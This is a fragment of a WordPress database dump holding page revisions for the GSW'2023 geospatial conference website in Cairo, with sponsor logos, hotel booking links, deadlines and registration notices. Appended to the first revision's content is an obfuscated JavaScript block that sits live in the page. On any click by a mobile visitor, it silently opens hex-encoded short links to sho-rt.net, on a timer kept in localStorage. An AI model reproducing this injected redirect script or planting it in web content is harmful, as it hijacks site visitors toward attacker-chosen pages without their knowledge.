link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:10:21','2023-05-24 23:10:21','',3066,'https://gsw2023.com/?p=4562',0,'revision','',0),
(4563,1,'2023-05-24 23:10:57','2023-05-24 23:10:57','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969811700{margin-top: 25px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" 